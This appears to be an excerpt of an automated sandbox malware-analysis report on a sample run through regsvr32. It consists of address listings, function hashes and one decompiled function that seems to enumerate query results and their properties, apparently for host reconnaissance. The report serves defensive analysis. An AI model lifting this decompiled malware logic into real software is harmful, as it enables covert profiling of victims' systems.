                                                                                                                                                                        0x049f858e
                                                                                                                                                                        0x049f858e
                                                                                                                                                                        0x049f8599
                                                                                                                                                                        0x049f859c
                                                                                                                                                                        0x049f859f
                                                                                                                                                                        0x049f85a2
                                                                                                                                                                        0x049f85a9
                                                                                                                                                                        0x049f85ac
                                                                                                                                                                        0x049f85af
                                                                                                                                                                        0x049f85b2
                                                                                                                                                                        0x049f85b5
                                                                                                                                                                        0x049f85bb
                                                                                                                                                                        0x049f85c7
                                                                                                                                                                        0x049f85cc
                                                                                                                                                                        0x049f85d9
                                                                                                                                                                        0x049f85d9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f858c
                                                                                                                                                                        0x049f836a
                                                                                                                                                                        0x049f836f
                                                                                                                                                                        0x049f8375
                                                                                                                                                                        0x049f8375
                                                                                                                                                                        0x049f837d
                                                                                                                                                                        0x049f837d
                                                                                                                                                                        0x049f8385
                                                                                                                                                                        0x049f8385
                                                                                                                                                                        0x049f838d
                                                                                                                                                                        0x049f839a
                                                                                                                                                                        0x049f83a3
                                                                                                                                                                        0x049f83a8
                                                                                                                                                                        0x049f83ed
                                                                                                                                                                        0x049f83ef
                                                                                                                                                                        0x049f83aa
                                                                                                                                                                        0x049f83aa
                                                                                                                                                                        0x049f83ad
                                                                                                                                                                        0x049f83b0
                                                                                                                                                                        0x049f83b7
                                                                                                                                                                        0x049f83ba
                                                                                                                                                                        0x049f83bd
                                                                                                                                                                        0x049f83c0
                                                                                                                                                                        0x049f83c3
                                                                                                                                                                        0x049f83c9
                                                                                                                                                                        0x049f83d7
                                                                                                                                                                        0x049f83dd
                                                                                                                                                                        0x049f83e6
                                                                                                                                                                        0x049f83e9
                                                                                                                                                                        0x049f83e9
                                                                                                                                                                        0x049f83f2
                                                                                                                                                                        0x049f83f5
                                                                                                                                                                        0x049f83fb
                                                                                                                                                                        0x049f83fb
                                                                                                                                                                        0x049f8402
                                                                                                                                                                        0x049f8402
                                                                                                                                                                        0x049f8409
                                                                                                                                                                        0x049f8409
                                                                                                                                                                        0x049f8411
                                                                                                                                                                        0x049f8411
                                                                                                                                                                        0x049f8418
                                                                                                                                                                        0x049f8425
                                                                                                                                                                        0x049f842e
                                                                                                                                                                        0x049f8431
                                                                                                                                                                        0x049f8436
                                                                                                                                                                        0x049f8438
                                                                                                                                                                        0x049f843b
                                                                                                                                                                        0x049f8442
                                                                                                                                                                        0x049f8448
                                                                                                                                                                        0x049f844b
                                                                                                                                                                        0x049f844e
                                                                                                                                                                        0x049f8451
                                                                                                                                                                        0x049f8454
                                                                                                                                                                        0x049f8457
                                                                                                                                                                        0x049f845d
                                                                                                                                                                        0x049f846b
                                                                                                                                                                        0x049f8471
                                                                                                                                                                        0x049f8474
                                                                                                                                                                        0x049f8477
                                                                                                                                                                        0x049f8477
                                                                                                                                                                        0x049f847a
                                                                                                                                                                        0x049f847c
                                                                                                                                                                        0x049f847f
                                                                                                                                                                        0x049f8485
                                                                                                                                                                        0x049f848c
                                                                                                                                                                        0x049f8492
                                                                                                                                                                        0x049f84eb
                                                                                                                                                                        0x049f84eb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f8494
                                                                                                                                                                        0x049f8494
                                                                                                                                                                        0x049f849f
                                                                                                                                                                        0x049f84a2
                                                                                                                                                                        0x049f84a5
                                                                                                                                                                        0x049f84a8
                                                                                                                                                                        0x049f84af
                                                                                                                                                                        0x049f84b2
                                                                                                                                                                        0x049f84b5
                                                                                                                                                                        0x049f84b8
                                                                                                                                                                        0x049f84bb
                                                                                                                                                                        0x049f84c1
                                                                                                                                                                        0x049f84cd
                                                                                                                                                                        0x049f84d2
                                                                                                                                                                        0x049f84df
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f84df
                                                                                                                                                                        0x049f82b4
                                                                                                                                                                        0x049f82ba
                                                                                                                                                                        0x049f82bd
                                                                                                                                                                        0x049f82c0
                                                                                                                                                                        0x049f82c0
                                                                                                                                                                        0x049f82c3
                                                                                                                                                                        0x049f82c3
                                                                                                                                                                        0x049f82c9
                                                                                                                                                                        0x049f82c9
                                                                                                                                                                        0x049f82d1
                                                                                                                                                                        0x049f82d6
                                                                                                                                                                        0x049f82e3
                                                                                                                                                                        0x049f82ec
                                                                                                                                                                        0x049f82ef
                                                                                                                                                                        0x049f82f4
                                                                                                                                                                        0x049f833c
                                                                                                                                                                        0x049f82f6
                                                                                                                                                                        0x049f82f6
                                                                                                                                                                        0x049f82f9
                                                                                                                                                                        0x049f8300
                                                                                                                                                                        0x049f8306
                                                                                                                                                                        0x049f8309
                                                                                                                                                                        0x049f830c
                                                                                                                                                                        0x049f830f
                                                                                                                                                                        0x049f8312
                                                                                                                                                                        0x049f8315
                                                                                                                                                                        0x049f831b
                                                                                                                                                                        0x049f8329
                                                                                                                                                                        0x049f832c
                                                                                                                                                                        0x049f832f
                                                                                                                                                                        0x049f8338
                                                                                                                                                                        0x049f8338
                                                                                                                                                                        0x049f8342
                                                                                                                                                                        0x049f8348
                                                                                                                                                                        0x049f834b
                                                                                                                                                                        0x049f8352
                                                                                                                                                                        0x049f8352
                                                                                                                                                                        0x049f8705
                                                                                                                                                                        0x049f8705
                                                                                                                                                                        0x049f8708
                                                                                                                                                                        0x049f870a
                                                                                                                                                                        0x049f870f
                                                                                                                                                                        0x049f871e
                                                                                                                                                                        0x049f872a
                                                                                                                                                                        0x049f872f
                                                                                                                                                                        0x049f872f
                                                                                                                                                                        0x049f8720
                                                                                                                                                                        0x049f8720
                                                                                                                                                                        0x049f8725
                                                                                                                                                                        0x049f8725
                                                                                                                                                                        0x049f8725
                                                                                                                                                                        0x049f8711
                                                                                                                                                                        0x049f8711
                                                                                                                                                                        0x049f8716
                                                                                                                                                                        0x049f8716
                                                                                                                                                                        0x049f8716
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f870f
                                                                                                                                                                        0x049f82ae
                                                                                                                                                                        0x049f82a3
                                                                                                                                                                        0x049f82a6
                                                                                                                                                                        0x049f8734
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f8734
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f8737
                                                                                                                                                                        0x049f8737
                                                                                                                                                                        0x049f873b
                                                                                                                                                                        0x049f873b
                                                                                                                                                                        0x049f873b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f8284

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                        • Instruction ID: c66fe98648549c6f82811031e04389e1116099f57217cfbb5aa48e94e470e785
                                                                                                                                                                        • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                        • Instruction Fuzzy Hash: F9F170756091118FC709CF19C8D48F67BF5AFA9310B1E82FDD8899B3A6D731A980CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F6350 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 44fb6fab652d1a8a2462ff7a1f07a6750f22f956e12f4186d585e04bc3bbf81f
                                                                                                                                                                        • Instruction ID: 8b02634b6d442af875bd3d702115c192e47e01d7c87b02f82749c914190f8be5
                                                                                                                                                                        • Opcode Fuzzy Hash: 44fb6fab652d1a8a2462ff7a1f07a6750f22f956e12f4186d585e04bc3bbf81f
                                                                                                                                                                        • Instruction Fuzzy Hash: BE7179716242654FD744CE2EF8D0579BBE1E78A321386453AEA49CB385C53CFD26CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F2988 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b771039e32cd1d657bc2e7110d9b1e0fea45bb356098b23afef8415d1b8b763f
                                                                                                                                                                        • Instruction ID: daaa71a2e33ae6d1e16d1f3d7fcf3e0e9fd81ae7d81c21c533a239bbeef8ea05
                                                                                                                                                                        • Opcode Fuzzy Hash: b771039e32cd1d657bc2e7110d9b1e0fea45bb356098b23afef8415d1b8b763f
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A517AB3B041B00BDF688E3E8C642757ED35AD505270EC2B6F9A9CF24AE878C7059760
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F358D Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d030e6f52c91103da046ddd69d1c15c771b0cd6223f9bc8d63c0d8cc4d0c4bdf
                                                                                                                                                                        • Instruction ID: 5f28d326fe5f896ceb46db8ac173be4146dbc0919352fce4aada640820aa1024
                                                                                                                                                                        • Opcode Fuzzy Hash: d030e6f52c91103da046ddd69d1c15c771b0cd6223f9bc8d63c0d8cc4d0c4bdf
                                                                                                                                                                        • Instruction Fuzzy Hash: B62181366140128BD75CCF2CD8A2A69F3A5FB88310F45427ED91BCB682CB75F442CB81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EEA4A Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E049EEA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E049EE400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E049E8BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E049E8BF4( &_v60, 0xfffffffe);
					E049EE4B4( &_v104);
					return _t320;
				}
				_t165 = E049E9DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E049E9DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E049E9A5A(_t165);
				_v60 = _t322;
				E049E8BAF( &_v52);
				E049E8BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E049E9DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E049E8BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E049E8BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E049E98BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E049E98BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E049E8C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E049E8BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E049E8BF4(_t136, 0);
								E049E8BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E049E98BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E049E9DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
								_t217 = E049E9DF2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E049E8BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E049E8BAF( &_v92);
											E049E8BAF( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E049E9E51();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E049E8BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E049E9DF2(_t283, 0xe0a);
										E049E9E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E049E8BAF( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E049E98BD(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E049EE92E( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E049E8BF4( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                        0x049eea53
                                                                                                                                                                        0x049eea59
                                                                                                                                                                        0x049eea60
                                                                                                                                                                        0x049eea63
                                                                                                                                                                        0x049eea66
                                                                                                                                                                        0x049eea6b
                                                                                                                                                                        0x049eea6d
                                                                                                                                                                        0x049eea72
                                                                                                                                                                        0x049eeeba
                                                                                                                                                                        0x049eeeba
                                                                                                                                                                        0x049eea7f
                                                                                                                                                                        0x049eea81
                                                                                                                                                                        0x049eea84
                                                                                                                                                                        0x049eea87
                                                                                                                                                                        0x049eee9f
                                                                                                                                                                        0x049eeea5
                                                                                                                                                                        0x049eeeaf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeeb4
                                                                                                                                                                        0x049eea92
                                                                                                                                                                        0x049eea99
                                                                                                                                                                        0x049eeaa0
                                                                                                                                                                        0x049eeaa3
                                                                                                                                                                        0x049eeaa8
                                                                                                                                                                        0x049eeaaa
                                                                                                                                                                        0x049eeaad
                                                                                                                                                                        0x049eeab0
                                                                                                                                                                        0x049eeab1
                                                                                                                                                                        0x049eeaba
                                                                                                                                                                        0x049eeac0
                                                                                                                                                                        0x049eeac3
                                                                                                                                                                        0x049eeacc
                                                                                                                                                                        0x049eead1
                                                                                                                                                                        0x049eead6
                                                                                                                                                                        0x049eeaed
                                                                                                                                                                        0x049eeafa
                                                                                                                                                                        0x049eeafd
                                                                                                                                                                        0x049eeb04
                                                                                                                                                                        0x049eeb09
                                                                                                                                                                        0x049eeb10
                                                                                                                                                                        0x049eeb15
                                                                                                                                                                        0x049eeb1c
                                                                                                                                                                        0x049eeb1e
                                                                                                                                                                        0x049eeb2a
                                                                                                                                                                        0x049eeb2d
                                                                                                                                                                        0x049eeb2f
                                                                                                                                                                        0x049eee8f
                                                                                                                                                                        0x049eee90
                                                                                                                                                                        0x049eee99
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eee99
                                                                                                                                                                        0x049eeb35
                                                                                                                                                                        0x049eeb38
                                                                                                                                                                        0x049eeb3b
                                                                                                                                                                        0x049eeb3e
                                                                                                                                                                        0x049eeb40
                                                                                                                                                                        0x049eee5b
                                                                                                                                                                        0x049eee5e
                                                                                                                                                                        0x049eee61
                                                                                                                                                                        0x049eee63
                                                                                                                                                                        0x049eee85
                                                                                                                                                                        0x049eee8a
                                                                                                                                                                        0x049eee65
                                                                                                                                                                        0x049eee68
                                                                                                                                                                        0x049eee73
                                                                                                                                                                        0x049eee7a
                                                                                                                                                                        0x049eee7a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeb46
                                                                                                                                                                        0x049eeb46
                                                                                                                                                                        0x049eeb58
                                                                                                                                                                        0x049eeb5b
                                                                                                                                                                        0x049eeb5d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeb65
                                                                                                                                                                        0x049eeb68
                                                                                                                                                                        0x049eeb6b
                                                                                                                                                                        0x049eeb6e
                                                                                                                                                                        0x049eeb71
                                                                                                                                                                        0x049eeb74
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeb7a
                                                                                                                                                                        0x049eeb88
                                                                                                                                                                        0x049eeb8b
                                                                                                                                                                        0x049eeb8d
                                                                                                                                                                        0x049eeba6
                                                                                                                                                                        0x049eebb5
                                                                                                                                                                        0x049eebbd
                                                                                                                                                                        0x049eebbd
                                                                                                                                                                        0x049eebc0
                                                                                                                                                                        0x049eebc7
                                                                                                                                                                        0x049eebcb
                                                                                                                                                                        0x049eebd1
                                                                                                                                                                        0x049eebd3
                                                                                                                                                                        0x049eee43
                                                                                                                                                                        0x049eee49
                                                                                                                                                                        0x049eee4f
                                                                                                                                                                        0x049eee52
                                                                                                                                                                        0x049eee52
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eee52
                                                                                                                                                                        0x049eebe2
                                                                                                                                                                        0x049eebf6
                                                                                                                                                                        0x049eebfa
                                                                                                                                                                        0x049eebfc
                                                                                                                                                                        0x049eec01
                                                                                                                                                                        0x049eee10
                                                                                                                                                                        0x049eee16
                                                                                                                                                                        0x049eee21
                                                                                                                                                                        0x049eee2c
                                                                                                                                                                        0x049eee32
                                                                                                                                                                        0x049eee38
                                                                                                                                                                        0x049eee3b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eee3b
                                                                                                                                                                        0x049eec07
                                                                                                                                                                        0x049eedde
                                                                                                                                                                        0x049eedde
                                                                                                                                                                        0x049eede1
                                                                                                                                                                        0x049eede4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eec0f
                                                                                                                                                                        0x049eec17
                                                                                                                                                                        0x049eec1e
                                                                                                                                                                        0x049eec24
                                                                                                                                                                        0x049eec26
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eec2f
                                                                                                                                                                        0x049eec44
                                                                                                                                                                        0x049eec4a
                                                                                                                                                                        0x049eec53
                                                                                                                                                                        0x049eec56
                                                                                                                                                                        0x049eec59
                                                                                                                                                                        0x049eec5b
                                                                                                                                                                        0x049eedd1
                                                                                                                                                                        0x049eedd4
                                                                                                                                                                        0x049eeddd
                                                                                                                                                                        0x049eeddd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeddd
                                                                                                                                                                        0x049eec6b
                                                                                                                                                                        0x049eec6e
                                                                                                                                                                        0x049eec75
                                                                                                                                                                        0x049eec7b
                                                                                                                                                                        0x049eec7e
                                                                                                                                                                        0x049eec81
                                                                                                                                                                        0x049eec84
                                                                                                                                                                        0x049eec87
                                                                                                                                                                        0x049eecc3
                                                                                                                                                                        0x049eecc3
                                                                                                                                                                        0x049eecc6
                                                                                                                                                                        0x049eed72
                                                                                                                                                                        0x049eed86
                                                                                                                                                                        0x049eed96
                                                                                                                                                                        0x049eed9a
                                                                                                                                                                        0x049eed9c
                                                                                                                                                                        0x049eedb3
                                                                                                                                                                        0x049eedb7
                                                                                                                                                                        0x049eedc0
                                                                                                                                                                        0x049eedcb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eedcb
                                                                                                                                                                        0x049eeda2
                                                                                                                                                                        0x049eeda3
                                                                                                                                                                        0x049eeda8
                                                                                                                                                                        0x049eeda8
                                                                                                                                                                        0x049eedaa
                                                                                                                                                                        0x049eedab
                                                                                                                                                                        0x049eedb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eedb0
                                                                                                                                                                        0x049eeccc
                                                                                                                                                                        0x049eeccc
                                                                                                                                                                        0x049eeccf
                                                                                                                                                                        0x049eed3a
                                                                                                                                                                        0x049eed4e
                                                                                                                                                                        0x049eed5e
                                                                                                                                                                        0x049eed62
                                                                                                                                                                        0x049eed64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eed6a
                                                                                                                                                                        0x049eed6b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eed6b
                                                                                                                                                                        0x049eecd1
                                                                                                                                                                        0x049eecd1
                                                                                                                                                                        0x049eecd4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecd6
                                                                                                                                                                        0x049eecd9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecdb
                                                                                                                                                                        0x049eecdb
                                                                                                                                                                        0x049eece1
                                                                                                                                                                        0x049eecfd
                                                                                                                                                                        0x049eed0c
                                                                                                                                                                        0x049eed15
                                                                                                                                                                        0x049eed1a
                                                                                                                                                                        0x049eed1d
                                                                                                                                                                        0x049eed23
                                                                                                                                                                        0x049eed23
                                                                                                                                                                        0x049eed28
                                                                                                                                                                        0x049eed34
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eed34
                                                                                                                                                                        0x049eece6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eece6
                                                                                                                                                                        0x049eec89
                                                                                                                                                                        0x049eecb0
                                                                                                                                                                        0x049eecb5
                                                                                                                                                                        0x049eecba
                                                                                                                                                                        0x049eecbc
                                                                                                                                                                        0x049eecbc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecba
                                                                                                                                                                        0x049eec8b
                                                                                                                                                                        0x049eec8b
                                                                                                                                                                        0x049eec8e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eec94
                                                                                                                                                                        0x049eec94
                                                                                                                                                                        0x049eec97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eec9d
                                                                                                                                                                        0x049eec9d
                                                                                                                                                                        0x049eeca0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeca6
                                                                                                                                                                        0x049eeca9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecab
                                                                                                                                                                        0x049eeded
                                                                                                                                                                        0x049eedf3
                                                                                                                                                                        0x049eedf9
                                                                                                                                                                        0x049eedfc
                                                                                                                                                                        0x049eedff
                                                                                                                                                                        0x049eedff
                                                                                                                                                                        0x049eee02
                                                                                                                                                                        0x049eee03
                                                                                                                                                                        0x049eee06
                                                                                                                                                                        0x049eee08
                                                                                                                                                                        0x00000000
